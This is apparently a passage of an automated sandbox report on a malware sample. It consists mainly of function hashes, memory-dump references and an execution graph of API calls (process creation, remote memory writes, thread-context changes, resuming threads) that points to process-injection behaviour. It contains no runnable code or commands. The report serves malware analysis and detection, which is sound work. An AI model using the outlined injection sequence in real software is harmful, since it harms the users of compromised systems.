                                                                • Instruction ID: d30466afe4933474877d7c51fe98221f0089d1c49f771bb1ef18c29de4926692
                                                                • Opcode Fuzzy Hash: 5cbbebd0111d4c30626a8d814cf1f113a397f198479acfc5ff47df34707a257d
                                                                • Instruction Fuzzy Hash: 8221BAB5E00219AFDB01DF79D880BEEBBF6EB48750F008065E905E7384E730E9428B95
                                                                Function 06B53B50 Relevance: .1, Instructions: 78COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9577c582d281328838fdb63e8e382ba22da65102704b734aa1f7e91bbc737a23
                                                                • Instruction ID: 3f113f6a5f2fca190768a417596aeca13659d2931402d023f7cf00e81a453ddb
                                                                • Opcode Fuzzy Hash: 9577c582d281328838fdb63e8e382ba22da65102704b734aa1f7e91bbc737a23
                                                                • Instruction Fuzzy Hash: E6217AB5E002199FDB40DFB9D890BEEBBF1EB48750F118069E945E7394E730D9418B94
                                                                Function 0122D4D8 Relevance: .1, Instructions: 75COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2917428866.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_122d000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 720fdd15045926b07e8226485fd8dfffd23a164b8a053668987ced7d01818b49
                                                                • Instruction ID: e3766003d3387f08568f1fb8e2d3d705231772d1adb7d1a1292e4c73f0091a32
                                                                • Opcode Fuzzy Hash: 720fdd15045926b07e8226485fd8dfffd23a164b8a053668987ced7d01818b49
                                                                • Instruction Fuzzy Hash: 46213A71514208EFDB05DF58E9C4B1BBFA5FB88318F20C16DE9094B256C3B6D466C7A1
                                                                Function 0123D030 Relevance: .1, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2917691550.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_123d000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6a57d8770ade7f22efea25c82ec80eb3665e4e6d7aa31c28e017a9d1d8304707
                                                                • Instruction ID: d15c450df85ea09130e65318a4d43143c0a9320f7a606354b61ec58bc379c9f2
                                                                • Opcode Fuzzy Hash: 6a57d8770ade7f22efea25c82ec80eb3665e4e6d7aa31c28e017a9d1d8304707
                                                                • Instruction Fuzzy Hash: AA2122B1614208DFCB11DF58D980B26FBA5FBC4B14F60C56EE9094B256C37AD446CA62
                                                                Function 06B56D88 Relevance: .1, Instructions: 68COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c0d91fc3d63e45ace3ea331d0fc1fea62619f0dd07d76073b7f4f923b3b68d83
                                                                • Instruction ID: ed7454723d24a38d5967e57c5a95529860abda57634ecf41218aeccf4e7a82cc
                                                                • Opcode Fuzzy Hash: c0d91fc3d63e45ace3ea331d0fc1fea62619f0dd07d76073b7f4f923b3b68d83
                                                                • Instruction Fuzzy Hash: 6F21D270B110189FDF84DB69E8547DEB7B7EB84310F158476E809DB394EB32AC418B80
                                                                Function 06B53C60 Relevance: .1, Instructions: 59COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c304a69f33f474cb13fcae96cbccea6b21fbdea666787e469f7167e11b98a4f7
                                                                • Instruction ID: 2993617736f287e1b47dedee208f7b45bf13e2f8fbba692181ffdc5d32aeed37
                                                                • Opcode Fuzzy Hash: c304a69f33f474cb13fcae96cbccea6b21fbdea666787e469f7167e11b98a4f7
                                                                • Instruction Fuzzy Hash: 8011AC32B102295BDB449A68C814AAE72EAEBC8340F01417AC80AE7384EA619C028BD1
                                                                Function 0122D4D3 Relevance: .1, Instructions: 56COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2917428866.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_122d000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                • Instruction ID: 51745f52545b910a50487b35f34611144543b5dfe42cb13825b168c5ac307be6
                                                                • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                • Instruction Fuzzy Hash: A2110372404284DFDB12CF44D5C4B1ABF71FB84318F24C2A9D9090B257C33AD46ACBA1
                                                                Function 06B53E98 Relevance: .1, Instructions: 55COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 05207f7395b84b12ca2bc9dd12c37a498ff7f0abfdb0edfdec4da50f8d36fc61
                                                                • Instruction ID: 4cec3b7fb871fec06622c8d3e11df86f9015e7b59474d209ff23eea593134378
                                                                • Opcode Fuzzy Hash: 05207f7395b84b12ca2bc9dd12c37a498ff7f0abfdb0edfdec4da50f8d36fc61
                                                                • Instruction Fuzzy Hash: 1801F130B102511BDB21D67DA85479BB6DBDBC9710F14887DF90AC7340E96ACC0243E1
                                                                Function 06B5EE08 Relevance: .1, Instructions: 54COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b4daa3fe016f2113b09882ce46ae6211162bc4b92c5c8bd7e2fa2fb0724e2684
                                                                • Instruction ID: bdddec897406390738c08d0b407df3f5a427fb052ee354319b11259f5c69a4fb
                                                                • Opcode Fuzzy Hash: b4daa3fe016f2113b09882ce46ae6211162bc4b92c5c8bd7e2fa2fb0724e2684
                                                                • Instruction Fuzzy Hash: 2501F735B341111BCBA5967CA420BAF77DBDBCA610F148879E90AC7340DE11DD0347D5
                                                                Function 06B53918 Relevance: .1, Instructions: 54COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5e5481562d7be45ef57c0e7044f97376f99e0962fa823b1af41abf0c69d98e4d
                                                                • Instruction ID: 0be668ac0dbb75c5cbd3fe161547b04373b60431a886f6a5632e551b06c220ea
                                                                • Opcode Fuzzy Hash: 5e5481562d7be45ef57c0e7044f97376f99e0962fa823b1af41abf0c69d98e4d
                                                                • Instruction Fuzzy Hash: DC21C0B5D01259AFCB10DF9AD884ACEFBB4FB48314F50852AE918A7200D774A554CFA5
                                                                Function 0123D02B Relevance: .1, Instructions: 53COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2917691550.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_123d000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                • Instruction ID: 70066c80a91ba9d4ba395afe0d8882b87141ec936dcf4d7e8104fb0601209882
                                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                • Instruction Fuzzy Hash: D911EBB5504284CFCB12CF58C5C0B15FFA1FB84314F28C6AAD9494B252C33AD40ACB62
                                                                Function 06B5A377 Relevance: .1, Instructions: 52COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f6a52735f7073c5d0d877d9a3481ae9d789c7d2d51ac511d0cac4f55b367f2b1
                                                                • Instruction ID: 172277f7b34e0e06b362388ede0e3d2f4d2a1d11845448f2e6f24ed41e43022f
                                                                • Opcode Fuzzy Hash: f6a52735f7073c5d0d877d9a3481ae9d789c7d2d51ac511d0cac4f55b367f2b1
                                                                • Instruction Fuzzy Hash: E3014270B142100FCB61EA3CE8607AF37E7EB8A314F018569E90EDB390DE24DC428381
                                                                Function 06B53920 Relevance: .1, Instructions: 52COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a6d5b7a4d75dc27eb49ebb6876bfe1a2137a90ea49c4ea1adbac60a16f71697c
                                                                • Instruction ID: ab3276eccddd57cfeaa27990d84585dffb6e12eea9b9a1e2ba069d202011ab87
                                                                • Opcode Fuzzy Hash: a6d5b7a4d75dc27eb49ebb6876bfe1a2137a90ea49c4ea1adbac60a16f71697c
                                                                • Instruction Fuzzy Hash: 7111CFB1D01219AFCB00DF9AD884BCEFBB4FB48320F10812AE918A7300D374A944CFA5
                                                                Function 06B53EA8 Relevance: .1, Instructions: 51COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 09bc64b78df912ce541c824c09e91c805a72e8c3ca287ce9b9f5b92e93b20fa2
                                                                • Instruction ID: b0cb94b2636aeace0033fb7ac55aa622161a927621108fb9f3b07b932d84410f
                                                                • Opcode Fuzzy Hash: 09bc64b78df912ce541c824c09e91c805a72e8c3ca287ce9b9f5b92e93b20fa2
                                                                • Instruction Fuzzy Hash: 2501D170B201111BDB64967DA85076BB2DBDBC9710F10983AFA0EC7340EE66DC0243E5
                                                                Function 06B53C4F Relevance: .1, Instructions: 51COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 98e9b0eb1d4c523d2d0855bfc5f9dd52a2622423d8fe1dedf657d918d4b4d2b7
                                                                • Instruction ID: dafd956cd8f41ce518dc3cee0fbd667e750b7a6779f3931fc083be101c7114e7
                                                                • Opcode Fuzzy Hash: 98e9b0eb1d4c523d2d0855bfc5f9dd52a2622423d8fe1dedf657d918d4b4d2b7
                                                                • Instruction Fuzzy Hash: 12018F72B241255BDB9496789C207EF72EB9BC9244F15857AD84AE7384EE60880247D2
                                                                Function 06B5EE18 Relevance: .0, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 078fcda9070da881af6fb1e3b8cddcbcb5381fadf4209aa8900f80f4cd1b30ea
                                                                • Instruction ID: 577f216f79ac16ffa99f4135ec7a5c1cb3a4d6368cb476ec8cbdd2b168fc46c7
                                                                • Opcode Fuzzy Hash: 078fcda9070da881af6fb1e3b8cddcbcb5381fadf4209aa8900f80f4cd1b30ea
                                                                • Instruction Fuzzy Hash: ED01AF75B301111BCBA4AA6DA450B6E73DBDBC9B10F119839E90EC7340EE25DD0347D5
                                                                Function 06B5A388 Relevance: .0, Instructions: 46COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4b0e34c2fe27a1c3cc576c94384181bc83ff98303f095c9e42a6ebbd78081547
                                                                • Instruction ID: 7a22f482d80ee5d745ddebbf244e2bd268dac48bf5abc379f15ffdc5163d5d3e
                                                                • Opcode Fuzzy Hash: 4b0e34c2fe27a1c3cc576c94384181bc83ff98303f095c9e42a6ebbd78081547
                                                                • Instruction Fuzzy Hash: 0D01DC70B101144FCB60EA6DE860B6F73DAEB89714F118928E90ED7380EE21EC428780
                                                                Function 06B5C850 Relevance: .0, Instructions: 43COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0ec0d7d790f4f30921f7f2d3839482a3c27751babbbd2f6a834af05c46751e6f
                                                                • Instruction ID: 73b02a979ccaaf884f5e0d1db754f62dc90ef5d46a03c8f2467394c270d2927c
                                                                • Opcode Fuzzy Hash: 0ec0d7d790f4f30921f7f2d3839482a3c27751babbbd2f6a834af05c46751e6f
                                                                • Instruction Fuzzy Hash: C801A471E212249BCF54AA69F840BADBB7AE785710F11857DE901EB344DB32AD058BC4
                                                                Function 06B564E8 Relevance: .0, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1b4f9a0744a26ea7bfb1af6351c6ff6cce8b3657adf88fe88b128237ec3f0150
                                                                • Instruction ID: 52695d8543022cfba52d1d63015a633a90c7d98a7d2dea0c6a155332a858e844
                                                                • Opcode Fuzzy Hash: 1b4f9a0744a26ea7bfb1af6351c6ff6cce8b3657adf88fe88b128237ec3f0150
                                                                • Instruction Fuzzy Hash: A9E0D8B0D192885FDF91CB709A143DB3BBED703204F6689E6D945DB153E135CA018790

                                                                Non-executed Functions

                                                                Function 06B57710 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                • API String ID: 0-2222239885
                                                                • Opcode ID: 860c4727e24d934b53ebfc007a241de1d81b5ac1054934ca549fe96a0edafede
                                                                • Instruction ID: 3f397afa3984b8fff6700acf14b1f89b2cf3cc2c9eb3cbc0a7815a2aefc215e0
                                                                • Opcode Fuzzy Hash: 860c4727e24d934b53ebfc007a241de1d81b5ac1054934ca549fe96a0edafede
                                                                • Instruction Fuzzy Hash: 48120870F002198FDB68DF69D854BAEB7B2BF88704F2185A9D409AB354DF319D85CB81
                                                                Function 06B5A9B0 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                • API String ID: 0-3823777903
                                                                • Opcode ID: 01a74ec5a85b239ba5842a196be9d9dc43c5959a464044f1983f1a530f48396c
                                                                • Instruction ID: 81ccfd6995fa07dd936c39a34f7354cd7adc053e3127749144c7251fdc36554c
                                                                • Opcode Fuzzy Hash: 01a74ec5a85b239ba5842a196be9d9dc43c5959a464044f1983f1a530f48396c
                                                                • Instruction Fuzzy Hash: 12917F70E00209DFEB64EF65D954BAEB7F2EF84300F118669E802AB394DB759C45CB90
                                                                Function 06B57110 Relevance: 9.2, Strings: 7, Instructions: 405COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                                • API String ID: 0-390881366
                                                                • Opcode ID: 32889605c901841871f9433b9fbbf2300d1db1eef4df6132d6aa0ea8c43c95c8
                                                                • Instruction ID: be4096bc0eb47595c6d1dacbafcbf32693bbb47300f421ed525cceb39e063af8
                                                                • Opcode Fuzzy Hash: 32889605c901841871f9433b9fbbf2300d1db1eef4df6132d6aa0ea8c43c95c8
                                                                • Instruction Fuzzy Hash: F1F11A74B00209CFDB59EB69D554AAEB7B3FF84300F218568D8459B3A8CF359C86CB91
                                                                Function 06B58448 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $^q$$^q$$^q$$^q
                                                                • API String ID: 0-2125118731
                                                                • Opcode ID: 1e435406894a055f68781082b5c6c48b182371509dcf1389b8fb9161b2d77df1
                                                                • Instruction ID: 90d13e34e04b786a7c25103aaca9d503747439965966c18d2cf03232e2df680c
                                                                • Opcode Fuzzy Hash: 1e435406894a055f68781082b5c6c48b182371509dcf1389b8fb9161b2d77df1
                                                                • Instruction Fuzzy Hash: 25B15B70E10219CFDB54EF68D5947AEB7B2EF88300F258569D8069B358DB34DC86CB81
                                                                Function 06B58860 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2947662464.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_6b50000_Ref#0503711.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LR^q$LR^q$$^q$$^q
                                                                • API String ID: 0-2454687669
                                                                • Opcode ID: e2472103f69e4b7af112ce2a724d9d14e03d68401cef82d89ff70200b8bb07d0
                                                                • Instruction ID: ada64c6cf9590d32186dcb6d0a95718d3d93f5d18f340f77cb58554eb5b3b2dc
                                                                • Opcode Fuzzy Hash: e2472103f69e4b7af112ce2a724d9d14e03d68401cef82d89ff70200b8bb07d0
                                                                • Instruction Fuzzy Hash: C051E770B002159FDB58DB28D950BAEB7F2FF88300F1585A8D8159B3A5DB31EC45CB91

                                                                Execution Graph

                                                                Execution Coverage:15.4%
                                                                Dynamic/Decrypted Code Coverage:99.2%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:354
                                                                Total number of Limit Nodes:20
                                                                execution_graph 57778 2abf329 57779 2abf32f 57778->57779 57783 5b34130 57779->57783 57787 5b34120 57779->57787 57780 2abfdda 57784 5b34145 57783->57784 57791 5b34235 57784->57791 57788 5b34145 57787->57788 57790 5b34235 2 API calls 57788->57790 57789 5b3415b 57789->57780 57790->57789 57792 5b34259 57791->57792 57793 5b3415b 57792->57793 57794 5b31e88 VirtualProtect 57792->57794 57795 5b31e90 VirtualProtect 57792->57795 57793->57780 57794->57792 57795->57792 58058 5b3ec71 58059 5b3ec89 58058->58059 58063 5b3fc01 58059->58063 58085 5b3fc10 58059->58085 58064 5b3fc10 58063->58064 58107 5d407e3 58064->58107 58111 5d40782 58064->58111 58115 5d40161 58064->58115 58119 5d40741 58064->58119 58123 5d40040 58064->58123 58127 5d40286 58064->58127 58131 5d40006 58064->58131 58135 5d401f8 58064->58135 58139 5d4057e 58064->58139 58143 5d401bc 58064->58143 58147 5d403b1 58064->58147 58151 5d40151 58064->58151 58155 5d401d1 58064->58155 58159 5d40651 58064->58159 58163 5d405f5 58064->58163 58167 5d400eb 58064->58167 58171 5d40829 58064->58171 58175 5d40249 58064->58175 58179 5d40709 58064->58179 58086 5b3fc27 58085->58086 58088 5d405f5 2 API calls 58086->58088 58089 5d40651 2 API calls 58086->58089 58090 5d401d1 2 API calls 58086->58090 58091 5d40151 2 API calls 58086->58091 58092 5d403b1 2 API calls 58086->58092 58093 5d401bc 2 API calls 58086->58093 58094 5d4057e 2 API calls 58086->58094 58095 5d401f8 2 API calls 58086->58095 58096 5d40006 2 API calls 58086->58096 58097 5d40286 2 API calls 58086->58097 58098 5d40040 2 API calls 58086->58098 58099 5d40741 2 API calls 58086->58099 58100 5d40161 2 API calls 58086->58100 58101 5d40782 2 API calls 58086->58101 58102 5d407e3 2 API calls 58086->58102 58103 5d40709 2 API calls 58086->58103 58104 5d40249 2 API calls 58086->58104 58105 5d40829 2 API calls 58086->58105 58106 5d400eb 2 API calls 58086->58106 58087 5b3eca1 58088->58087 58089->58087 58090->58087 58091->58087 58092->58087 58093->58087 58094->58087 58095->58087 58096->58087 58097->58087 58098->58087 58099->58087 58100->58087 58101->58087 58102->58087 58103->58087 58104->58087 58105->58087 58106->58087 58108 5d400d3 58107->58108 58183 5b30f28 58108->58183 58187 5b30f1c 58108->58187 58112 5d400d3 58111->58112 58113 5b30f28 CreateProcessA 58112->58113 58114 5b30f1c CreateProcessA 58112->58114 58113->58112 58114->58112 58116 5d400d3 58115->58116 58117 5b30f28 CreateProcessA 58116->58117 58118 5b30f1c CreateProcessA 58116->58118 58117->58116 58118->58116 58120 5d400d3 58119->58120 58121 5b30f28 CreateProcessA 58120->58121 58122 5b30f1c CreateProcessA 58120->58122 58121->58120 58122->58120 58124 5d40073 58123->58124 58125 5b30f28 CreateProcessA 58124->58125 58126 5b30f1c CreateProcessA 58124->58126 58125->58124 58126->58124 58128 5d400d3 58127->58128 58129 5b30f28 CreateProcessA 58128->58129 58130 5b30f1c CreateProcessA 58128->58130 58129->58128 58130->58128 58132 5d40040 58131->58132 58133 5b30f28 CreateProcessA 58132->58133 58134 5b30f1c CreateProcessA 58132->58134 58133->58132 58134->58132 58136 5d400d3 58135->58136 58137 5b30f28 CreateProcessA 58136->58137 58138 5b30f1c CreateProcessA 58136->58138 58137->58136 58138->58136 58140 5d400d3 58139->58140 58141 5b30f28 CreateProcessA 58140->58141 58142 5b30f1c CreateProcessA 58140->58142 58141->58140 58142->58140 58144 5d400d3 58143->58144 58145 5b30f28 CreateProcessA 58144->58145 58146 5b30f1c CreateProcessA 58144->58146 58145->58144 58146->58144 58148 5d400d3 58147->58148 58149 5b30f28 CreateProcessA 58148->58149 58150 5b30f1c CreateProcessA 58148->58150 58149->58148 58150->58148 58152 5d400c7 58151->58152 58153 5b30f28 CreateProcessA 58152->58153 58154 5b30f1c CreateProcessA 58152->58154 58153->58152 58154->58152 58156 5d400d3 58155->58156 58157 5b30f28 CreateProcessA 58156->58157 58158 5b30f1c CreateProcessA 58156->58158 58157->58156 58158->58156 58160 5d400d3 58159->58160 58161 5b30f28 CreateProcessA 58160->58161 58162 5b30f1c CreateProcessA 58160->58162 58161->58160 58162->58160 58164 5d400d3 58163->58164 58164->58163 58165 5b30f28 CreateProcessA 58164->58165 58166 5b30f1c CreateProcessA 58164->58166 58165->58164 58166->58164 58168 5d400d3 58167->58168 58169 5b30f28 CreateProcessA 58168->58169 58170 5b30f1c CreateProcessA 58168->58170 58169->58168 58170->58168 58172 5d400d3 58171->58172 58173 5b30f28 CreateProcessA 58172->58173 58174 5b30f1c CreateProcessA 58172->58174 58173->58172 58174->58172 58176 5d400d3 58175->58176 58177 5b30f28 CreateProcessA 58176->58177 58178 5b30f1c CreateProcessA 58176->58178 58177->58176 58178->58176 58180 5d400d3 58179->58180 58181 5b30f28 CreateProcessA 58180->58181 58182 5b30f1c CreateProcessA 58180->58182 58181->58180 58182->58180 58185 5b30fa8 CreateProcessA 58183->58185 58186 5b311a4 58185->58186 58188 5b30f28 CreateProcessA 58187->58188 58190 5b311a4 58188->58190 57796 5b3ed37 57797 5b3ed53 57796->57797 57801 5b319a0 57797->57801 57805 5b31998 57797->57805 57798 5b3ed93 57802 5b319ec WriteProcessMemory 57801->57802 57804 5b31a85 57802->57804 57804->57798 57806 5b319a0 WriteProcessMemory 57805->57806 57808 5b31a85 57806->57808 57808->57798 58220 5b3f358 58224 5d41d10 58220->58224 58229 5d41d20 58220->58229 58221 5b3e83c 58225 5d41d20 58224->58225 58227 5b312e0 Wow64SetThreadContext 58225->58227 58228 5b312d8 Wow64SetThreadContext 58225->58228 58226 5d41d4e 58226->58221 58227->58226 58228->58226 58230 5d41d35 58229->58230 58232 5b312e0 Wow64SetThreadContext 58230->58232 58233 5b312d8 Wow64SetThreadContext 58230->58233 58231 5d41d4e 58231->58221 58232->58231 58233->58231 58191 5b3f4e3 58192 5b3f4ff 58191->58192 58194 5b319a0 WriteProcessMemory 58192->58194 58195 5b31998 WriteProcessMemory 58192->58195 58193 5b3f54a 58194->58193 58195->58193 57859 5b3eb00 57863 5d41b50 57859->57863 57868 5d41b3f 57859->57868 57860 5b3e83c 57864 5d41b65 57863->57864 57873 5b312e0 57864->57873 57877 5b312d8 57864->57877 57865 5d41b7e 57865->57860 57869 5d41b50 57868->57869 57871 5b312e0 Wow64SetThreadContext 57869->57871 57872 5b312d8 Wow64SetThreadContext 57869->57872 57870 5d41b7e 57870->57860 57871->57870 57872->57870 57874 5b31329 Wow64SetThreadContext 57873->57874 57876 5b313a1 57874->57876 57876->57865 57878 5b312e0 Wow64SetThreadContext 57877->57878 57880 5b313a1 57878->57880 57880->57865 57881 5b3f007 57882 5b3e83c 57881->57882 57883 5b3ea4a 57881->57883 57887 5b31bb0 57883->57887 57891 5b31bb8 57883->57891 57884 5b3ea8b 57888 5b31bb8 NtResumeThread 57887->57888 57890 5b31c58 57888->57890 57890->57884 57892 5b31c01 NtResumeThread 57891->57892 57894 5b31c58 57892->57894 57894->57884 57809 2abf63e 57810 2abf648 57809->57810 57814 5b078f8 57810->57814 57819 5b078ea 57810->57819 57811 2abf686 57815 5b0790d 57814->57815 57816 5b07923 57815->57816 57824 5b07ad4 57815->57824 57829 